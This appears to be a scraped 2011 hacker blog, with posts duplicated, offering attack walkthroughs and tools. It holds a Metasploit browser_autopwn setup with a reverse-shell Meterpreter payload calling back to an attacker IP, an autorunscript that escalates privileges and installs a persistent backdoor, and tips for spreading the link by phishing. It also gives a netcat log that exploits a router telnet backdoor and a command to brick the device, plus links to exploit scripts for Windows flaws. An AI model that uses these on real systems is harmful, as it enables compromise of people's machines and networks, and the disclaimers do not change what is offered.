[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
No active sessions.
msf auxiliary(browser_autopwn) >
########
"setg payload windows/meterpreter/reverse_tcp"
> This command simply sets the global variable for payload as Windows Meterpreter where applicable.
"use server/browser_autopwn"
> This is to "use" the browser autopwn method
"show options"
> This shows options for the specific module
"set SRVPORT 80"
> Sets the variable SRVPORT to 80, meaning the port the targets must connect to is 80.
"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by metasploit, i.e. YOU.
"show advanced"
> Shows advanced options for the module
"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
>> First, it loads the "priv" plugin, so it can prepare to escalate privilages on pwned systems.
>>> Next it runs getsystem whilch escalates privilages to SYSTEM
>>>> Finally, it sets Meterpreter as Persistant Post Reboot. I explain the flags below.
>>>>> -U means it runs the Meterpreter Persistant Backdoor on User Login
>>>>>> -i 5 means it sleeps 5 seconds between reconnect retries. I set this to a big number if theres an IDS.
>>>>>>> -p 6666 is the port to connect back to where a Multi/handler is listening
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.
PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.
"run"
> This command runs the module!
"sessions -l"
> this command lists created meterpreter/shell sessions
"sessions -i 1" (not used here)
> Interact with session 1. -i <number of session> means interact with session <number>.
Once you set it up, a nasty trick is to send the link (IP:Port of server) as a tinyurl encoded link to people, so they get pwned rather swiftly. Or embed the link as an iFrame with onload into a malicious website for spear phishing...
Have fun.
~For informational and educational purposes only, I am not responsible for your use of this infodox. Dont be malicious... Its mean!
Saturday, 30 July 2011
Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilage escalation"
Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilage escalation".
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Un protected administrative provilages
> Privilage escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilage escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
�� �� ��
Terminal shell v1.0
Copyright �2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
~ This info is for educational and academic and such non evil uses only.
I aint responsible for your misdeeds.
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Un protected administrative provilages
> Privilage escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilage escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
�� �� ��
Terminal shell v1.0
Copyright �2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
~ This info is for educational and academic and such non evil uses only.
I aint responsible for your misdeeds.
Ch0mpy-LAN - New Tool Release
New tool release - Ch0mpy-LAN
This tool is my lame attempt at halfheartedly scripting up a method to automate some attacks using Evilgrade, Metasploit, and Fast-Track over LAN.
Later I will recode the whole thing in python with a far more useable UI, but for now it is just proof of concept, etc, because quite frankly I am a bit lazy.
To use it, unpack the ZIP (RAR was being a fucker) file in a directory of your choice and check is the stuff in /bin/evilGrade.sh right - i.e. path to your backdoor, path to evilgrade folder.
It was written with BackTrack 5 in mind using the tweaks I outlined in a previoius blog post.
Just chmod +x the shell script and run the perl script, its fairly self explanitory...
Have fun :)
~oh, I take NO responsibility for malicious use of ANY of my tools.
Your fault if you do something stupid.
DOWNLOAD: http://dl.dropbox.com/u/36983782/ch0mpy-lan.zip
This tool is my lame attempt at halfheartedly scripting up a method to automate some attacks using Evilgrade, Metasploit, and Fast-Track over LAN.
Later I will recode the whole thing in python with a far more useable UI, but for now it is just proof of concept, etc, because quite frankly I am a bit lazy.
To use it, unpack the ZIP (RAR was being a fucker) file in a directory of your choice and check is the stuff in /bin/evilGrade.sh right - i.e. path to your backdoor, path to evilgrade folder.
It was written with BackTrack 5 in mind using the tweaks I outlined in a previoius blog post.
Just chmod +x the shell script and run the perl script, its fairly self explanitory...
Have fun :)
~oh, I take NO responsibility for malicious use of ANY of my tools.
Your fault if you do something stupid.
DOWNLOAD: http://dl.dropbox.com/u/36983782/ch0mpy-lan.zip
Bobby_Tables.py - A rapid MySQL database extraction utility.
Ok, here goes. This is bobby_tables.py, a script designed to rapidly enumerate tables and dump them to .cvs files.
It was task specific as a challenge in automation when it was written a long time ago, but after that development was discontinued.
I reckon poor Bobby here deserves another chance!
This is the newer version, I will edit this post later to include an older variant of the script. Just edit it as per the comments and python bobby_tables.py for winning!
http://pastebin.com/raw.php?i=SN1hxs4z <--- SOURCE CODE
Enjoy and use responsibly.
Friday, 29 July 2011
Quick script for metasploit exploitation over LAN of a few microsoft vulns...
This is a quick perl script that allows you to fire a few exploits (with the meterpreter bindshell payload) to exploit the following microsoft vulnerabilities...
MS-08-067
MS-10-061
MS-03-026
MS-04-031
MS-07-029
Link to script (fuckms.pl)
http://pastebin.com/raw.php?i=8pw4Z6Dz
Some infodox about the exploits...
MS-08-067 Netapi exploit
> Used by Conficker to spread, later used by Stuxnet...
> http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
MS-10-061 Spoolss Exploit
> Used by Stuxnet to spread, originally thought to be 0day but was not...
> http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx
MS-03-026
> http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx
> An old exploit... good though :)
MS-04-031
> http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
> Worth a try... Sometimes.
MS-07-029
> http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
> Never had a chance to test it :(
So, if you have any input/feedback/complaints, hit me with em :)
MS-08-067
MS-10-061
MS-03-026
MS-04-031
MS-07-029
Link to script (fuckms.pl)
http://pastebin.com/raw.php?i=8pw4Z6Dz
Some infodox about the exploits...
MS-08-067 Netapi exploit
> Used by Conficker to spread, later used by Stuxnet...
> http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
MS-10-061 Spoolss Exploit
> Used by Stuxnet to spread, originally thought to be 0day but was not...
> http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx
MS-03-026
> http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx
> An old exploit... good though :)
MS-04-031
> http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
> Worth a try... Sometimes.
MS-07-029
> http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
> Never had a chance to test it :(
So, if you have any input/feedback/complaints, hit me with em :)
Tweaking BackTrack 5 for maximum effectiveness.
Ok, so you downloaded BackTrack 5. As did 9001 other security-interested people, ranging from script kiddies to professional pentesters and equally professional blackhats.
The first thing you notice is, it is *not* perfect. Fast-Track is half broken by the updated MetaSploit Framework, and some tools are just plain missing.
## Updating, adding tools.
In fact, some people preferred Gnack-Track, which is now End-of-Lifed thanks to the shiny new GNOME BackTrack for those of us who despise the Fisher-Price interfaces of KDE.
So, first off, we run apt-get update && apt-get upgrade to install any nice new "fixes" that the team has come up with.
Next, if you miss some of the stuff from the GnackTrack system, or just want to update and add more awesomeness, go here for the BT5-fix script that "fixes" some things and adds others...
https://www.phillips321.co.uk/bt5-fixit-sh/
So now we have updated a bunch of stuff, installed new tools, but what next?
Ever notice how much of a pain in the ass it is that every time you load BT5 you spend a moment starting WICD daemon so you can connect to wireless networks?
## Adding WICD to init.d
root@bt:~# cd /etc/init.d/
root@bt:/etc/init.d/# gedit
Now save the following shell script as "wicdstarter.sh" in /etc/init.d/.
#!/bin/bash
# startup script for WICD daemon
# starts wicd
echo "[+] STARTING WICD"
/etc/init.d/wicd start
echo "[+] WICD INITIATED"
Now run the following command: "update-rc.d wicdstarter.sh defaults"
Followed by "chmod +x wicdstarter.sh"
That adds the Wicd Start script to init.d, saving you 0.5 seconds of your day.
## Fixing Fast-Track.
Now Fast-Tracks DB-Autopwn Automation seems to fail miserably since the update to MSF, so let me refer you to Zero Colds website for the fix he came up with.
http://zerocold.co.uk/?p=801
It works fine and now those of you who use that feature have it.
Also, check out his fine guide to NeXpose Installation on BT5 and MSF NeXpose Integration...
http://zerocold.co.uk/?p=840
## Adding ZeroColds Meterpreter Scripts for Post Exploitation.
http://forum.intern0t.net/other-programming-languages/2121-installer-sh.html
That "installer script" should install all his goodies. Let me see if it works (doing all this as I type)
Ok, it needs modification to function correctly. LETS MOD!
Modified code ---> http://pastebin.com/raw.php?i=iYRZSra9
Now I see the use for SOME of the scripts, others I am not so sure about. Though I reckon they are somewhat useful in a pentest to prove the amount of power one can have over a compromised system...
## Wi-fEye Fixing and Installation (and installing evilgrade + hamester)
Hamster and Ferret installation...
I put the Hamster-2.0.0 zip file in /root/work while I worked on it.
root@bt:~/work# unzip hamster-2.0.0.zip
root@bt:~/work# cd hamster
root@bt:~/work/hamster# cd build
root@bt:~/work/hamster/build# cd gcc4
root@bt:~/work/hamster/build/gcc4# make
root@bt:~/work/hamster/build/gcc4# cd ..
root@bt:~/work/hamster/build# cd ..
root@bt:~/work/hamster# cd ..
root@bt:~/work# cd ferret
root@bt:~/work/ferret# cd build
root@bt:~/work/ferret/build# cd gcc4
root@bt:~/work/ferret/build/gcc4# make
root@bt:~/work/ferret/build/gcc4# cd ..
root@bt:~/work/ferret/build# cd ..
root@bt:~/work/ferret# cd bin
root@bt:~/work/ferret/bin# mv ferret ~/work/hamster/bin/
root@bt:~/work/ferret/bin# cd ~/work
root@bt:~/work# mv hamster /pentest
DONE!
That is Hamster and Ferret installed in /pentest/hamster/ where Wi-fEye can use them!
###
Now lets install evilgrade-ng...
First run "apt-get install expect" to install the wierd dependancies.
Now we are back in the work directory and this is very easy.
root@bt:~/work# tar -xf isr-evilgrade-2.0.0.tar.gz
root@bt:~/work# mv isr-evilgrade evilgrade
root@bt:~/work# mv evilgrade /opt
Now it gets a bit harder. "WHY WONT IT FUCKING RUN!" is a common cry I hear.
It is because we need the Data::Dump perl module, which I will now show you how to install using the CPAN shell...
root@bt:~/work# cpan
Now it will ask a buttload of questions to which I just say "yes" lol
cpan[1]> install Data::Dump
I promptly get a load of output. I just say yes, again, to any options.
Once it is done doing "lots of shit" just type exit then you can run Evilgrade
Now lets install Wi-fEye...
###
Wi-fEye installation!
root@bt:~/work# tar -xf Wi-fEye-v0.5.6.tar.gz
root@bt:~/work# cd Wi-fEye-v0.5.6
root@bt:~/work/Wi-fEye-v0.5.6# gedit Wi-fEye.py
Now check that the infodox is correct... as in the paths - to things. It should be...
http://wi-feye.za1d.com/Documentation.html <--- better Wi-fEye infodox there!
Also download Wi-fEye from there
Download Evilgrade-ng here
http://www.infobyte.com.ar/developments.html
I cannot find a good Hamester download for the life of me so here is one
http://www.mediafire.com/?8486i3frg82wo11
http://dl.dropbox.com/u/36983782/hamster-2.0.0.zip
YOUTUBE VIDEO NOW ADDED!
Enjoy...
The first thing you notice is, it is *not* perfect. Fast-Track is half broken by the updated MetaSploit Framework, and some tools are just plain missing.
## Updating, adding tools.
In fact, some people preferred Gnack-Track, which is now End-of-Lifed thanks to the shiny new GNOME BackTrack for those of us who despise the Fisher-Price interfaces of KDE.
So, first off, we run apt-get update && apt-get upgrade to install any nice new "fixes" that the team has come up with.
Next, if you miss some of the stuff from the GnackTrack system, or just want to update and add more awesomeness, go here for the BT5-fix script that "fixes" some things and adds others...
https://www.phillips321.co.uk/bt5-fixit-sh/
So now we have updated a bunch of stuff, installed new tools, but what next?
Ever notice how much of a pain in the ass it is that every time you load BT5 you spend a moment starting WICD daemon so you can connect to wireless networks?
## Adding WICD to init.d
root@bt:~# cd /etc/init.d/
root@bt:/etc/init.d/# gedit
Now save the following shell script as "wicdstarter.sh" in /etc/init.d/.
#!/bin/bash
# startup script for WICD daemon
# starts wicd
echo "[+] STARTING WICD"
/etc/init.d/wicd start
echo "[+] WICD INITIATED"
Now run the following command: "update-rc.d wicdstarter.sh defaults"
Followed by "chmod +x wicdstarter.sh"
That adds the Wicd Start script to init.d, saving you 0.5 seconds of your day.
## Fixing Fast-Track.
Now Fast-Tracks DB-Autopwn Automation seems to fail miserably since the update to MSF, so let me refer you to Zero Colds website for the fix he came up with.
http://zerocold.co.uk/?p=801
It works fine and now those of you who use that feature have it.
Also, check out his fine guide to NeXpose Installation on BT5 and MSF NeXpose Integration...
http://zerocold.co.uk/?p=840
## Adding ZeroColds Meterpreter Scripts for Post Exploitation.
http://forum.intern0t.net/other-programming-languages/2121-installer-sh.html
That "installer script" should install all his goodies. Let me see if it works (doing all this as I type)
Ok, it needs modification to function correctly. LETS MOD!
Modified code ---> http://pastebin.com/raw.php?i=iYRZSra9
Now I see the use for SOME of the scripts, others I am not so sure about. Though I reckon they are somewhat useful in a pentest to prove the amount of power one can have over a compromised system...
## Wi-fEye Fixing and Installation (and installing evilgrade + hamester)
Hamster and Ferret installation...
I put the Hamster-2.0.0 zip file in /root/work while I worked on it.
root@bt:~/work# unzip hamster-2.0.0.zip
root@bt:~/work# cd hamster
root@bt:~/work/hamster# cd build
root@bt:~/work/hamster/build# cd gcc4
root@bt:~/work/hamster/build/gcc4# make
root@bt:~/work/hamster/build/gcc4# cd ..
root@bt:~/work/hamster/build# cd ..
root@bt:~/work/hamster# cd ..
root@bt:~/work# cd ferret
root@bt:~/work/ferret# cd build
root@bt:~/work/ferret/build# cd gcc4
root@bt:~/work/ferret/build/gcc4# make
root@bt:~/work/ferret/build/gcc4# cd ..
root@bt:~/work/ferret/build# cd ..
root@bt:~/work/ferret# cd bin
root@bt:~/work/ferret/bin# mv ferret ~/work/hamster/bin/
root@bt:~/work/ferret/bin# cd ~/work
root@bt:~/work# mv hamster /pentest
DONE!
That is Hamster and Ferret installed in /pentest/hamster/ where Wi-fEye can use them!
###
Now lets install evilgrade-ng...
First run "apt-get install expect" to install the wierd dependancies.
Now we are back in the work directory and this is very easy.
root@bt:~/work# tar -xf isr-evilgrade-2.0.0.tar.gz
root@bt:~/work# mv isr-evilgrade evilgrade
root@bt:~/work# mv evilgrade /opt
Now it gets a bit harder. "WHY WONT IT FUCKING RUN!" is a common cry I hear.
It is because we need the Data::Dump perl module, which I will now show you how to install using the CPAN shell...
root@bt:~/work# cpan
Now it will ask a buttload of questions to which I just say "yes" lol
cpan[1]> install Data::Dump
I promptly get a load of output. I just say yes, again, to any options.
Once it is done doing "lots of shit" just type exit then you can run Evilgrade
Now lets install Wi-fEye...
###
Wi-fEye installation!
root@bt:~/work# tar -xf Wi-fEye-v0.5.6.tar.gz
root@bt:~/work# cd Wi-fEye-v0.5.6
root@bt:~/work/Wi-fEye-v0.5.6# gedit Wi-fEye.py
Now check that the infodox is correct... as in the paths - to things. It should be...
http://wi-feye.za1d.com/Documentation.html <--- better Wi-fEye infodox there!
Also download Wi-fEye from there
Download Evilgrade-ng here
http://www.infobyte.com.ar/developments.html
I cannot find a good Hamester download for the life of me so here is one
http://www.mediafire.com/?8486i3frg82wo11
http://dl.dropbox.com/u/36983782/hamster-2.0.0.zip
YOUTUBE VIDEO NOW ADDED!
Enjoy...
Subscribe to:
Posts (Atom)